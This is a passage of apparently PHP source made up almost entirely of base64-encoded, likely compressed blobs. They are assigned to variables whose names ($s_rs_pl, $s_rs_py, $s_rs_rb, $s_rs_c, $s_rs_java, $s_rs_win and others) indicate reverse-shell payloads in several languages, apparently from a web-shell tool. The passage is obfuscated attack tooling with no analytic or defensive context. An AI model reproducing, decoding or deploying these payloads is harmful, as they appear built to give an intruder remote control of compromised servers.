pN1UM70iexxAydXaL4Yqz8xd8Aj959ersMCiV3F/dS0N7Hg66VMLPCd6DCw7/xpqKYBv4DbPCrpZfZebT+8vcAdP3zxo2LFxdes81aKsU/JjGudabv12P4AfYMy0nN/PUr2/IHt/Pn53+r25j+S507481Elwdq+79zz0m4P9GlpR8UmLXunfdcZBLsZJrQy42NMfsPYl3LtQy+LAezvSLjHUud+9e47ZAdpt/hSnP5Z89J0o56C6KhT55nUPnVq9yI6vCNH53OeYvhyO3hzcaawjdpLhenquB9ldnj5d5Bt2KgWWyz1DCy6OHnqmGZxC78HRGmDf94EDfo102BnpThv/3R08sPIcaDpLNOOitBPrnYuG3kdOin5k+vdg+Q3K36WXf3fdvRGAyKv460Zeocit059VfUlQHygcu+D8jxTzkV4+UMv7WnlHKd+mOolOia/98pCkcZjkXx7yc7r7JOQ9lyavy4QfwwD25+qTG6w4cX7m+OmtYL4KcZM4LyACY9Bl+1lwkM+fvmPkA8nxT8bRp2B8+B3cXrLGw4mtINbycyr/gCX4I5ag12Q6uP36XYK/qKvD4Bc55UWMjIAyb0oNw4oAMtyk3Bcp6WTYF8VWJ50FsjAolp/eqGtOnH29WQTy9I8KxecloJb5I/43fJ07T7nlZSH5XabJ4+QlTfeV531gpeFLN0ZvYOX50PRz0II/1ycPmRWCBqTxngvek3beLoUeunx9d6qDb3X/0r7oHyxBLqTOhruSw5+DrCPofgHa+pxIb0Xz+ZA/ZePn7e7w6bXT3gT+6NOB/10qfB0gNyOfYvUNPb4ougbQrTLfLVuhb1KXnlXZ3puG/iMKvCkEr9h0PflPmuRzWn4rLm/K6mcmDGBCYMznJnAwuM3WDWif/1Wl94/thXzPQud9f0RTxCdTzOsov3tugh+iOPfsj6Lus5njtYd/H6gXXuAXMHDRxN3wlqd3XfjGg+04zl+2tWlH7TZqO5u9UZr++PjvMPh1w/HlbDHwdBs41w8Ef8+bxPofw7UMHyz6x4ORZffXt7veXaDpVnAaPD1dnfLcGp0y7DUvdnDz8gvFvR7Ehv8ye74EpfvUSixQEUTx5el2Lokz75Qcu7T+dpN0ycNJ7J3A7zMyPZ4eLPMN2d6mfX/i+QpWXy7YO7g+pF8+JPkyj3UnvUnTCzXHeizS4LfvzHw5pjPzpcAFEHH91HFqM198T3swU6+07s9O9KkvAg+mlRnvrbxZagBO/nn+nGSZt+y/s3343XYtCN5IXacRLzLB2+MVEzMgfKh1OvwUJfit0L5Gqq7/IcTCvjGt59edoGT6/DbDekPKbiKwXn3ZOg1nw6cf9cPJDz5tPVQodAlr9JpUqxGBXMbA0/Mghl8HsetntkgrPedUgT49e7zt1Zb59RTf9yco6WRG0BNi/JrH4O0L+Oeswlssfu24WprG1dlrz4Th4Te8OD3HnZh58wg9wM9wOxhe6+UztXP5+I3mpZz8thW/Lr7w9Lo7zQBwWAponV/1pbcz8dvjbw6CPA3M9MgEXiKfetnLwC+nkV86hs66+FvRQaH/2y8PeZiAsH8Ag7/83inl55/+Hw==";
$s_js = "7Vvnl9tGkv88fs//A6y7XZILagAwUyPKxwDmnEmtVg+hEUgkIhAAd/W/XzcAgmE4ku3zvrsPJ0szRHd1VXX1r1KD/virIRk//yQBhgdm8l1d12yg2e/nvgE+YDbwbGLHHBmLM2XDfpd6+fkn4m+YZNvGB4JwXfd5b/q6CDTZe9ZNkeB0HhCsqbsWMAlLN22bYRVAYO+xGXyYowcsyaWwme0wpo31GU00ZV4E2N+In3/6T+srWoKIvu4srIK9Oy4lmy1bOfqYA50xUSPXiyG93SojnCqPhmNuMxys2XabL4pNNtvOu9lOT2aaarff38+01WlUWuNEa9stlMjjqghamUlrhJ/m44bknUa7UT6fVVRXLjSzvp9vlce+5bd7CujWOrbR3uFzfdmz8jMl4+Xah8x6oKya/aw8m4209pwkHEKusaAt8OZe3J/KuDZz2Oy43T7KNV6dyAQ5nRXye7U0l1nKsb3D2Oj3Gp6w3nW9fDlPH7dF9rAczvOaWCKc+Vqcr422cQKNVrFUzgDT6JvHudB0B0duSzR5iRwWvPoxIw80lSjqotYUun1X57pNwW2wtCtluVpL7NRtl66W+zalsrzIyyu636eK1nZo1OmGXh/1mvleu3Gk5+pie6huHbq6ZjZ66+DViiV8XaD2LTMPPFrTuR0xbuumwdGbUtHijc56SPUBv+1L9FBytt5alstKrc6YxoAuLmmi6om63SMJy2tMcwuW5rL8YrZyKEqb+ZNpoT7vKZbMDa3RYSiKmjVe+oY48YwBaA/yjbVe3ki7lS2Ck0667HwwojLUxmfXnF0+uK3udDJg5ZKs5g41nlLV/bib542TP2I8bz/k1Ny82puP+pnTcDNSD61svW6z+90xo+dW0rw3m2kCO2gqanuq24dRdSj49YnROpi2c9iOMuNes70qnhxndjCUpZCZlQ1JJfdK5sR1F/5p4a/5HiCIbXlHeAWvbbflLMgW1e2R80/4cDLQZ8xOrWUbrLxsO1RG4zvZ9oBd5EhDLZG55ii7cnFubSgL+XTICKpnro9Z1uTqlHkYSBvScXvGcVCsr+q9cXOEK0zrtNoX3BZe0pmdl53IU37ZB325UCMppVXrS8Zh2JKd9aaVqZn6zi/0vaHWzG7WvdysbzVsXqF5NkPocm6Z6bdERynVB86Ka2fNo+kRgtR3iqXOxpuXWkV5MyFcvS0smjl9Oc9n1dmuNMpMCqK6rpbo07G3Xe0PpXyJIIRebcSTZK/JkHiRI/rHMk5s9IJ3rPG1U1OWBof9vksdDba8zwvlU6O21vCS4I09v7HlSCCe1MUiV6yZDc9tjLfcKmeN2qU+u8nxojdwJbY5z7dHqtLLFxrdKX5aDPt0n+FLItPJrQYNY1gaCQ1JNOZtt74tc1MDZ3jBHxu4rOFTjbZremvr6MJmzDdr866fXQ83tE0XirOtXfR7zdGxumwp2RXYZmdLwe7hx0ZW5ccbXa/zQr9t9jym0+6X2XwGFJe6VQZ9VqTWWRmUSH7Q3M9W6tBZLrYkodJZw2lyCi159bZRIje+3wZNoTbv2StlogwKHify7cUgP2da8z0tdWkvwzY3bK4w6oAZv3JblNjnm61llSGplmguhw1mmyEXGq5UmcGwNGSL/EbNyUKt0GJxvEa4ZU+fTdyZwLTXNLe3WOk0Hmn8SgcLQvJm7HHXX9i1oTQtV5tEwW/w3smoGzI5HlHtDiWadqs93BZdi5pm3VppJ3eA1dIbdNfQ66WO112JGZ+asjhgwdCuMbK5KObzsmI2qwa+kDKraq9IGzWFXLmqOOiqvb1W0qmdvx9vWkaPLg0seeluN2Kz0xvvBju2lx1NT0TGKFheboRz1hp3hGVjfJDypXJhTPllsVmfzIrrEVnWT0Rtnl9nlk1605lb1e1CLxWqJi1qJ9cvWd3axGtO6vje7ffmXfcwznZn+WF+J+e0leYJYDXTGlwfJ7pdhpUsOZOhdpn5iQdqy/StOrmjrL1XoPtr0xsvM/bSqo7zlNPcH8tWeSnOabk5W/ZWYhGGoXxr6q3MWnebUfEi0Aq8pHWAQTQy6+GU2YP1usXP6qtRmV/WN5n8yGpSmwGOt715uVsUiZxdk2giz6135WabrMuDsUgJ0+yk5+wOI2PrjjqSt7OXNbLu09PTTDX43bK1zPXBaNdQBwc8Xy37Y5fqt7tdc7I85IuLkrnf7o6Ssfa9tpP1QWc3YNXtaebIp3W7tDAFczUskJlMY20d4cEIpgTqTqnfYUe5/i6jN+Xjvrhw+v6x1Dc3vSFeoHpKadRfMTbtaGUNEK3+dLnIOvi40G/Ul5PehC2PM/slkHmgk+A0ofZ2tr3vj06zsdu31BxnKrhjHfj5qdxQwDy7zbA7brAQZ1qZHHG833RmLam6rS1Oem4y1zuLmrmXpPVaG4PGZmQpozyztNwd4yiHQW1t75alsUdY/a4ISbZEdgr6c0qXKNvR+wt6bI97a5Jcgna/tcwwlLMaSOpKmdWb/fWQESZbdtCaH8pdri1ZtdyoPK/vGwcaViYCsCR+Zs77uRk1BStjtVoUZzV3Jrs1i+zaomv6eHnXZbzBepxfmm3/OJN31DE3WgsdsJ4eWHEzywvgMFlbk9WQ6ZPixhSARtO9odEiqbwzz80m1W7+OB6Pd3ORrA+gW5q1DDvYDY1uU6Y5g86Wx2bRaXp0tzPKlMkcUWu3exy+wevlo1PFV6NhZo53MlN8ufcX6rjDTJo2fdD5/DBbM4XhmD85O5ho1M4uuwEDqdxdMTgz4XudNiXmcaVEE5vTqtPh9IW/z+aFqecpALqY0cjPvXaH1jt0lm3WD47OMvh4580a0wxdkleFolufWht9oFt6vVsiaKp2svsFWLLgx+OyNSFOctmtGyNlml1tjM5uPaULu8lpOxsyB8exSoMFdK353htLXbW/V/dcDmwG9tEc9rTuiVzZpkk3dweCyS7Hc3Jjl2arWW23Fno2sIf+1rJ6JXfZk6wyUyqtsi2xNpydtKF8HEk6rtJdXdLEYqkwwZmy2iVzORGoxZpXm6jzmjPY6ic+px17rHOc2EwmU54uc3Z3UZ47quurRRNnfa558pvT8bLQBtV1qbTOdClSFkeF7LruV3dLRhguszWaWPKK1wD53pSsybqXdfRj4VCoZnICWxKq5iB/GoxyVjXbmhzcYhYfzeWZS+93HqPMJsrYVWhZPAytst4VcOPYye02uQPjkNOS3pUVbjpZ7TaEubCOHcPqtTSjMC4fCy15rfKbhskW8PmmX2rZVEcvV8XRyBcXtEhmFNeduNxB7W3K7malNSeb5nAIyFZWI1dSnjzs1QI/cXBvP6OE+orNjNfsrDzvTcB8NDeNfM8V5o6/ZBe1trgcme6ccBeVd5fS3IK1uSjbksM+c7pK8IAneF01YYXvw0o8/ogK8YZj2bKGNWTmdK7Bz/NRDb5cdoewBoe5mzTlSaFVq+5GwBYVCdQaVNlptU2D3Vd7zLTJHbYDdVJoz2p5ooRnVBXvG2zeHwu5WUvjG3ZLnOdbjWmjLVsbYWGaxl5ya6a32eq6sJj2W/ZoVaUIPD/zeqOpjFPLck9p9TR2uVnyGYWxqe3swBHtTH0ynIFJx93n1lnG1UoL9aSeDgNVKm7H3cNMP2kEtSCmZK48bucK7Vy94Zp6Lut119UxPR4dypOiALP34bRqlDumWjpNJovpVukRY3c9qtYWzoEebw+caNQaulkGY41S6t1ZQRVmisisVrumXRSGkqT5UqM19afqmPZWy9puVed2DlHdNmtWdVnW9rS6W5jDfD13nBxP4JRZ5upWvjlSpwepMwZFqwbGrXWjw4FlFijlZSnPjQcHs1+z5nrB9fiRVef3RaWzlZtFVXNxOts0d4w8XOFGDvi435ly2TXj9EjSFE3NndL50WQyyh2p+q5VPTT5HumVc3kd2ujIN0rL6VY7zqvjoXdsFRaWW7UHO3q749jpclMWNh5bzRYLjWGz0e95Soft9oVjbm/A6FCbD49sE68yTnvTHCyy8titBFhD/wFO0jHxJGsCPB6QZBkLFHJfeYDawORtO5dKPX+H8ApzKdRj/voJsRccjbNlXcMU2YJNaTL1z59/ejoyJqYwEJn8swhsWgEqbFetmj9nxCGjguQ7JuhSnwTdTMqQjHzB5I8K86wATbQl+IDjAZ8nWUgqzGf5yzPD8/QRMukHUoCZwh6PY8l3nCJz+3dp7KxZEiCC1D9FPWlLsvUsmUBIh2Mvwa9nwwx+N4AAs6CdTL2YwHZMDRMYxQIv39LB70DhJwA/nUXDxpmTAulQqq69JTdi9ofFB4K//fzTtytjy9ZXxjQZPwkt/dXWv9rACgwWrUyO2B3gEGfd1m3fAM+2PrNNWROfOUZRrldhlUoFS3zWgwVYFTH9kkj9itmmAz6EGtyKRvuA+tuBPHg+8OOzK8mcFHDKYv/6F4aGWMe2ITUay6Swmx0h2AQQOb1GSACPhJgINg25n0IcIGofUp+eZRuogSHD80AIQpMxivzXIHry0XGZQNWPIBku+xaaFP60kQ4BxhfTTtIOpm0UVO1ny1BkO5n4NVAmVCe2uw0t99e/YrYVicM+oX3GuiLs29Zn8svLeeQYjlBfQl6IWby4UslGmsbrcCgWD+jRp4DLU8Qi8+W8hZg30vd41vevofGCGTGwMDSSan2GVr0SzlQqiUQKYypn9uIzEx5wBWMuZBegQacPdXxl8qP1wOaBeID0spD1ZY0H3khIJiqRdgF38KlCQh14XtYMx06K6Yjagq4EkmQapG5HAE6lzssDT3y1NI0lzgK+nQ86IA21uij1QKM3FLrT5rUqDzS5qPEttK3lsKpsJ8++HK5xoQ66+6zoHBNZ3n65OPEj57OdPXTdpJJmz+537T81v8MnlVQKezD4bNm+Ap55GaKEQa6U0HQNJF7e4MI+4sI+4MJC7fdvslEwHEt8TTxUKZqC6OQcK7DMzU51UVRgFnpzn2wqThG/QdFY09+4rdg44Un9TlN8e3BqSZlPc3z6kD6m9fOmftFTmI6WBqvuE2YgSOYDzLCP5/DEV+Tccbjk+NCtOR7Scy4fDTMoVrGX8CQH3DiYzm0QMUwmLoye5EsssCygCNGgCmxJR5wThm7ZiUuU0H8Jg8nZB+R0Qld4DcbyBNxsRHc9y/EJaIxQ2NU4Mk4C3Wcn0glX5m3pQ4k0vBf4BP8GRKfEq0VorqVjv8BfoZfFi7OZu8UwKT1e78F/YcYKyOFRvVrBPjOGATS+LskKNH3E5jvIuQNBLFFIa3CbdtpKc2lOiaFgpzCYixKSzPNACxi8eVIBn/jMtRQmPyNbQ1ItGjuisSOjOEGwiwZtNIiqgXOggWMWGgv3wFnWHJoenfkZTWgyKmzgcFzYhEB6CFcuMtbDuRu0PrLdxYOguWUN1nPt+aAfO8i3s14KUoxTGMsahvvmlKCcfH1E1ycQ7INT+UuNyjqC8EjTBKSK7YuIzraEmrzHLAkoCga7NpXReOw9BP41SajrtVwY4zVFZ/ikKzFh2YQ+BFn5Ji8Eo9DdYCEG+A5KTxXyjpUkBMVXvAHzofYS8L7C6iF1BtHhIRXvqMYNGeeY0K8hLaQMPyfNS+kDjs974NdhoVSpUFGZdxnJFe5HSvcD2UzqPrW95pwjL1HK+s7mkgZjWqADvcFOxZk4wPM/OQUwgfKpFytOLla8Jeh2wYfoV+olyNB3igU5+k61bOn3q/b+36PaNSQsSXeh4BDUnO5oNkCoiJV4AO6QCKbeALKBgpCDLavBSqhPB83DyWQi4i6fB1KJNEXeO9YrIqQKQUhOEo5G0mKUfQ+yD8gfWzrC7gN6FJUSJJXJ5vKFYqlcrdUbdDMOp3ABYmiGO78ahYNoDnYJMBbB8o74u4UTsphOxGHARDnUuoKAbcaB6ek136cfM31dSUPqq1K6AhsnJAWvYFHzJpi6WpcYEwHyAjO0CsYRSAqzGexC0hhVSJ2zbqgm/HnR4vM//u5lqPd/94r0l0Cd50ifB7Qff0Tw6YogILmJ25A0gOwT/BGiLDovHD/H8vC5Urk6SyzwkxiEZ2zeww7i6w8Ew+8Cyv434+gmzJKhya6CwiUihjh7KyKHCEQ5+REwLkErjj3h4r9kf6lETWpQFcY90D4F+x6E75DuY7CFEIjndo6TzPPeIqxFsYo6N2QsgHhGCTCa+VShUr9iN0vIc2T7EPkNrAKEMF4lH4j+9YE8GOwvi8046UbCcWgUHAt4RiSX6GqmsTOLy6f7XvHb+Qj+391/k7vzqhEidMDY0rOg6Pr5oIhsyCQEDmISKR0uOePmgppwPETNFTmZDifiY48RE45/RLQxYF7JucLLbWiKEfPuo2UwqDqE5WQlITI+k8CCyrQCWyLNfu8CWZTsDyzsaF5Y3eSB+Z7VYaugfqAMD7N0Reax/xBI8jxp68b9TOLTOygIWQKJI5C8YCQG6qucnoz7AgQpm7GdCIvxYwXd0MWxIBi+QmgQaP5oMfAaqRHV9QXPJeC9FXOjHukp0g0P3OPKZdDE62u5p3gr4Ydbd7p4UyA/aFceyPfOXRv8dHPqIc946lUNfncQ4IiqLlSRJ0GcZx42PgnU36E1jKIb6Pcl4D9shhKI9RVl1KjHdxogNBRs5w3JQL31pd+pJCygso7my1c3FDfziXPcZ1PYRc45WCYetaeXDMMhHTD4B+luxHkKjQR3LaE94JozHfrDheUsFljxPBjETaAE249XRc3slNFEcEMNKZ4RFmY2+toZRCaMfAyHsAnDdaj72c+vVhlBxao8o1uDczANZ7+FvwLroBR4USGUANuTV2OowSMTqVv291QR/6guN+6L4Ysh0waVNjJnT0Zs7NmZU7D/KMvHrQD2gCYZMjk3JZfthHZELfsVr3Md9Go68jDzmdMVhTEskETx4zwY2/3W7AZ1TUBr/N105jwd+cgjF7qUN2/5T3ztD50T1WGJ+N3QTQy6fT30xITXyhfXvh24ymmf//HpC/7pkomvtRNgCYSuRJK2H+t3/1oi9FdEdXktgaoDuAa6p8XLJrrgPN227pAH9XJ1XtcrBFkBj5fc9/ucBLg9emPzY+NxrO69HXNiMiYmC2LOD6x8jkaBbQNlAI8cJ+mhwGTBuIQe5F/QrTnaH/xEnd8T3KyB+fYzGT9egn2Qp86HB9MUVDXS+Pbp5YEiKYTyq0ugwARfzya9io13ZOfw92TrNqPEC15dQUuyItuwnFZi4yNNYaz5gZ4oeiu/Q8k3dfyBfvfT/0OIRDC/YXrVtUTovEPMFWAQXrDXR3Tp9CoIJY/u9QID3E1gSeysBPYBS+AcnsDQuz8LS93fr6nQbjAkifqfZIKI3+3ef+BM59tEENdg4abZOI1zjp1A3nI1oht+InQWHoZlfS/D1B0JryTwiBBPvCQeF2W3rvra9JE+eORdEbd/hdwuEkMyKBBYHAMjYfj8KuFc9DYYywaR4vGtNhvUUumEn0ifCcL6/mGNdXkl97+wq4dKn8/lu1r/lmh5F/bia7unH4W4VwUckshdRc0rbtfwN/byH0gQfxTTf+Z5/RzfrwMzeIN0C6lg7+EBefCAgnzz8haFIfPoEK9OOZ68P8b/qwfJc+htH5J9hjE6I5bTtc8y/wW9Lq28YMAzZBNYlbnkpDGSwrqwdaXKRRIjyQ/oL4W1BvOX+xAJo7puXHpKizNhFXipGHkHHXH0OtpgRLAZCQKsRMO2OSBG74zODWc4YuuwN0dLH1V9gcAoJ/HPrM77z+GquW4EyONhyate2ex6NsgzFmQQDj5IfGED/qMNQXRLQfOeTL3//Zu7Wv2dbYaa/NGdXsn4wZ6vp5CoWPEYl0GhPZdVoEPPeHhhGm/N1sMdYVednhU2QN9VGMfudwhbMwm1F8iCOvY+5BJcr6FzTGOyhgJNhny5CGI0WX39NhG9ILk6RHT1iWIGXP8SXzfA2IEKMMaSNRHdMqVjcYEOl1N6+v0nAXmHK8PbUuxjbKDouyqRdtjVa5KzsdGOgq1e3yaGifPuRIO5oDmNDIKWvjrraId2mk1zaXD9xa73HPa38KqNgx2VTQD4mAyexx0iA1sKHAZ2HGNfXjX3Z5hdMQvWqYyXDDPnlcHaAXH6TZNF81fr9MCl3l53M3+1jlNkOP32uut5uOzeUjATOAZ6t8pdEiAK+fB83n20zU8fbR6DDS+6cKskMolPHyUTIz59JGwe/UDzIU103xd+bYDKBV86+NSEbVpIiv4FGQdDXWAlETRwmBZEePTZgJb8/CVxvkO8fHXglnGORIxVxhRl7QP5knikyqcZcwTQl+4F32pIkn95uROXiHQLvj4R6WZBXoKu8MBE2oX1W+Idzrk8/u6xdLTn4LsEyfDOiFFSf54mEe8rXW6VeHeuOt68YYsOO+7DGXQxJmsWMO0qv4PtPsQKbCCSifB2F2ioKECAeBM48p8JnPwFONhi2v9TLIes5pjKm0b79+LmVvL/OnS+Z4jfih75D6PnI/rfcLH/cjRF1vbJd8+2auysZzj2LvWC/frpvwE=";
$s_rs_pl ="lZLxj5MwGIZ/Xv+KyvU2SLhj80xMVllcGJrlvLHQncY4JQw+BzlGCe3pzG7+7bbIOaIxUX7q9/bL8zZPOHvi3Iva2eSlA+UXXEFdoDOcSVmJseMkPIXLLefbAi4TvnMqZ3P1/NndhcigKBx0LwDPg/GY8eQOJEWEC5d8CtRBZK4B+4rXEq/88MbdS6h3dMlG7mBNlu9m68mAtvcqpE2/yPBFblCUfzY16PvO+arS3Do0tHMvuGFL3zvHzrVBj4hIdwuyqrnkm29lvANzIJNqYFEkmteYzO4vX0Xzhb+y+yzwriO2Cv3pjU2k9fCQ5mBaTdXLafj6reuOrAPqkcolevww/EhRT4DUKF5pFgveRJqiaCyIQv+W+dPZLLRHitJTr0/Vjt6O07SO8tIklT1f6I1ounhvnRp7RS4klGr7qhPGSQKqxrOZ1RQrnGcbjWvcuMZjnPCyhERCui4Ne6j3eAUlZqvZfGEbL/qeQR+D4HZlG5Nu4odhm6Ae7CHByumpPim4ANOz6M8D+3XQ7M6guJ1JMa0Gl0s8pAgdERTiZPTpn0ZJ1k6jZsrdvAQZxZIrX1lHB4nd31ySvHPdmlAOSdyJG23s37SZrbZJnxkWfUxab92oFaejv5v7L2GNJjhobab6e45IfT8A";
$s_rs_py = "lVRtT9swEP6c/IpgpmGrwaGFaVJZKiEIE9qAqu20D8Cq1LkmEalt2S6Ufz87SV9ATGiqWveee3vOd+f9vWipVTQreQT8KZAvphDc3w8KY6TuRxETGdBciLwCysQiktHs+OvJ46EuoKoiv1xIoUygINTLmVSCgdah0KF+sV/BHsGEplyAL2OE/ML9ZDAPamfMSN/3nE+89aVDIYFjFtYm8UQtbWSTiaV5ZXQ1TBwMSr0Hl/wtSnxPgVkqHjiUNhGpgjTDpLOGbLQdaCENJn5NN2WmFLzhW84DoSlPF7AXI26Qhbx5zOi8rIAL6+F5Vm/LN7DACFb19UyS0XW8MqAWp8NxNz74NPx9MTg4bbUWOq0boIvgsAy+fUYdbRSekw4KBrtCbyvZPFBpcNmfC5s6cDflJM+ol/r0lGWlgD3h7lHvxPHyYMVAmkYrU61rrI3iucpsCViRwVEDeLNYAdWQKlZgxLL7AN/9udcPHYJCFc6rNNfO4Or7ze0oOT8bJ6Rxs4FmbYT2umRqClrqrFR4RnMllhJ3CVnbuAtjxRtlq7ONAZ7hdT9aeEvaOrvRqOdJkZ2kSxOkPKsrsv9dTW0oJ/mbIEE7FpeplZpur3P1NzOD7jnqWJI5GPbsxgMNkJ/Htsk0VfmT395cTuK450Y6zu+6Dz5UO/jxFvcKe/ac3uaHVWlsuXY/Sm6wJL6Om7WhzYFb6exyenWTTNqdouPb8x/T8WSUnF1bF1uYcQohN/bj259TZ7TrMh0lv8bJ2cXFKLQZ35DW1E5ghjE6ovUHhdLdtqZVaUeZ4y+vPFw5btAC2znBOTCDcdF4bIfMLT7VFYB03pumvbdBnm6ag+rHpXkfgn7QxobMNsA1bdP3D8xRZ3dg2vXVxG/9HXP7xKQktg1kji7+F/HuR8TZ/xH/wPxd4oz4fwE=";
$s_rs_rb = "tVZrb9s2FP1M/QqWySprcaSm6zDMmWL0sQ4FVtRI0w1DlRU2dW0RkUmNpOoUSfbbx5ccu7aTDNhoGJTuPbxP3mPvPcpaJbMJ4xnwz1i2ky/RHq60btQgy6goIZ0JMashpWKeNdnkux+eXRyqCuo6iyT81TIJOFaCXoCObwXNWFd8PIc4ikqYYtXSCxUhCbqVHJ9+ePHHp9Gvz89evzt9m5ZiwelYQTofa1r14rlaMH5tv3PGZ4s4GWrZwmA6rhVEwEtvUcK4tk56SsvEWM7NHiE2xa+ZiRUumdJqGJRGOwrxpBwWTpp2BlItPpnQrGF73EWKdQUcy1ymM9VOelmRZX1SFCTBDhbSkD4ac+j56S+/pTXwma7y/CjCZlnRxyfn+d/Znx+fHP54fnXU//5mPxs2+RuuYQayFxDJwASr3RmVn70cvQf5GaSLk5B+kzgNzVU6phQaD6RpIxnXmLhuYNcNPMBUcA5UQ1lw4nATmDHunuwygXKhQy/wyprm1FaBrQnhEihWzs+0R+CyEVLjs59P3+aXGuT8ePT+KI+L/dHvr4qT+DjojfDY3SVV4UOGi5+Kx9+UuDhx21O/k/7UfpKlN7CNXXXdpbfsMUlJckBOyBpqUZlO49rEPgO9npBdcswUYJBSyBdS2ORr24ySQSGH+9kGPlSnTmkl5k2eE7IBCTBrh5Y4/TZjWyF21Xkd7o5BZqwfx4k3vPNEd3VLMz9UC/ll2KuTnWjvY1mge5CvmDTejeW7gPYy79I9rCNLS7UKZSoWgzvLtC1pX6cHJ3Qf/D9NC3aaevMubUQDvFf3iSTJ1TUT1515JizblAfEzOXBhq+b7c62hP21bPW9e5agaHt77w35LekFuGrlbQYqpbVYyUjlnNVRZ8v3cI3YnjqC3EFsxtEmtR0baZW7t6Nzw7G2gCEgT7ie8dyPh2e8vavqxrEeUg/gOOQJDqE1akMITQ1fOkZD1t3/TWSoy2wZ9OaFMsqOsJQnLCNB95CUix9tYSYU5KtU5GRoN/Gg7tAWmkHd4VVGCcI18vAi1zu37kzY1eUrJtgdRTfIm27XNf/GOQTktulUD5zONadh91v4M7B14FCYNhulnzPz5CYMhfHyk+fAVvIP";
$s_rs_js = "nVHLasMwEDwrkH8wvliGVIImUEjIqZ/QY/rAkTeWqCy5kpwUQv69kuykebSl2Afh3Zmd3Z2lNOHONXZOKdMlkErrSgJhuqYNXU8fZu93loOUdDzaFiaxTbFTyTIx8NEKAzhjXMjyrTGagbVZTiJh0ZEVuHOqD7O8h6wzUNTnaJc5EZhWVku4aNWlIqVXCZN5SkbXQlHLM4+IDe6nIY0s3EabmtSFYxzT151niTz/rmN1SeATQl3SSRam2nrkKBHCTjT8EQmqcny5nOb78QgFPvdkvxhhfnoHT2C2YPCmVcwJrbCNPGTJzggHOI2G9u3nYUcFzEH5rNKwVNJ/3WpeOJqJI/0ct5xYVwpFDNi2BpxfQ7p1xHdPy8IV6eQ4TYJDnO+P08RocbhVBmMGlv9Vdhz6php1LydSWAcqOr26fwnJw3gE0kJy7f/s5L+98P+xczRY36tM4kVX0yj330Og3y6AfrAeDfQcDTQbDXP58AU=";
$s_rs_c = "rVJhb9owEP0Mv8JjU+tQFxPaaVJpKqFCJbQVEGSapg1FwTHEqrGj2EzQqf99thMYYdqkSf0Q5e7d8zv73uEmSLXO1A3GRCa0tZJyxWmLyDXO8OLqw/XTpUop5xg0cf0tE4RvEgpulU6YbKV3FShnYnWKJZwtTrCdwnqXUfUnrCR5orqKC6qZ+TATVXwjmFG3GBMarGMmoA3ifEUQSeMcNE3449vc+1mv2YJCBMnA79Zr5qIbYgDTLE6SPGICMAOzJbSHg6Bjj9RYSzERLeM147ug9xANR4Owe8Azmesg1VIoGGvJoOvlzz3vN8Vqt5T7OSaHw1Gv359GvdFXR1NB8V5YqqPZ+P5jNAung94jahcUqi1HZhoqU/4UWYpjRtPB59nA6qEziRR7pnIJZdl/Cd8oj26ZhoXMgonECMCTl4Omd8ZQe+sXLG4GSoXhvXcpCWJCqOvcPlzH6BDUcHsB3F6AG0CkEJRomnwXDdS5LrnJJusYbiXxj5NOIbkzTdewQbd2pCAcTB+Drab5ujuZ+cH5u8mX/t15t6wayISUAGxehFUKLlmjuCuXikJi45d6jXJFwcHOq9e30y6kiwpiZ15M+Znmco8gM2tuprknXPgXx8he+587MJxMpuNwHIX3k72vsBz2X90sN+Gk5nnebft4I5yT6j+cVNXEP05e30lVOPlS/wU=";
$s_rs_java = "lVRNb9swDD2nQP+DkJM9ZHaTDdjWIsOwYYcBA1osvXXBoMiMrdWWBIn5Qpr/PkqWXXftpQfbEvlEPj5SznNWIRp3medCF5CVWpc1ZEI3uclX7z68v3/rKqjr/PxMNkZbZH/5lmdSZ2+unpoUYLCdn5nNqpaCiZo7x0KMP9Ydz89GxsotR2AOORJgLRWvI8wggz2CKhy7rSzwwuP7Az+U2eACyd4w6a6GrusNPvr0BgMDcrccDCZPz06eHUiPWEmXSTenyGFJxrmPdGpDfbnegrWygEHcrZYFsxuVpIHnCO2hXYxWB4S7JVuxOVOwY2H7cfpptrxq/VIhE+SkPL7MZJVGx66SNSTi8/wiZTHWiFhkOysRktXkYiI6aLCv642rkt70YsxT+LRvwVFUyfe9AINSKwbpETJSUZEWXNzfWi6AwgWwf7XVx3pjx0LZDZcqIf2kKqlQbkvXiuAr8+MQcrd+JpqCeI3zlVS5q8bBJdfJ4uAQmqwEvLHagMVDMtYuU7yBcZqh/ql3YL9xR4QyqQrYX6+T8U6qcerlOcao9Bm3fGO2nbeGgWNhaNklE1opEAjFb9VmH/Rn5wl8pb2LMi60uAdkVexdu42+vsNE39ec1aBKrObzaRyBUbgKc5pVhBJsZrh1QJuAvrtYdj1ZgKV5iqlcl2pgTHygDu25uIwL37Wu2W0/oXbA/iczey2ZVjhpCBtc0+Ug8UAEaSZswOv0shTs4YG9zGd4C0vpy668+gNzP8pPLmipe+zQ3oPJ392QzkQjJcD/Uujgr41C2YA/Hpc0UbAHkdDwpPFfQWrR5E5jwaSzeUZt4ol0CTx69ogu/V/FPGfYw6cZXR/r22dm/fJRxvB6xe2k5/QP";
$s_rs_win = "7Vh3WFPZtj8pkEASEiQISDsoCigdRkCDJAICChIBFQtCGhhNMzmhSAsTUEOMxq4ICg6jjgURlSpFcChWHBsKKDrohRvaIBcYUc8NI3e+Ke/73n/vj/fe+r619lm/Vfbae/+x9zphG9UACgAAtJZhGAAqga9EBf57kmnZwLraALiud9+mEhF63yZqK1cCisTCBDGDD7IYAoEQApkcUCwVgFwBGBAeCfKFbI4zgaBvO5ODHggAoQgUYE+zCPtP3h6AiMIhkN4AqFVIWhYBgHrfzISFM9VN48ivdSNm6v+NSmdivpq1BM7opN9x0h8Xoc1HQQD/47SWHu3624foDwUh/7a/PVo/t/8s47f1z/q7H/Wrn/vviyuc8SH/za/Bw9nVa3pyG4IeUp9qnPRJj3lrQx4bAMQGWg/tqdgigPDWOBheq3gnH8AWjTCoQBvcE68m9g5W1BMiSZ4taFu64aw+BGBINqgZTKpBY/R4aIO9qsCRFu2cigD+EH/KllQEutq2YNFoOsYDqNWUP9A1wc8f08W6kS4VYYcT4VfknAbpSsJ1pbGtu4KExznKe1+MZ9SMYAibzW4qfRTo5V++bBxAF62KANMUTXNvKywmJqphA0MLpWXPle9CFir9Sfay/MBq3j0j16tCa3d6vxAGVNACAJ5iDVebViN/go2fMMYAC7Xq+oJ3u8juL6wRLt3CinGyMhBbj/A9YNiQtNRXpSs+MWT5alWNh6X9cmyNSRec/kQ+iSBmw4TZxJwLGLeGT7UvvshvkzfFNKJph6ENvkd1zX0PTX2pei19o7nhq4O9AgX6WhrdX19jqUagIUkkVEq+NSTAqBLL2iv7Yc3pKygz1wm3zv5tRF8cZmlqzZoD2Q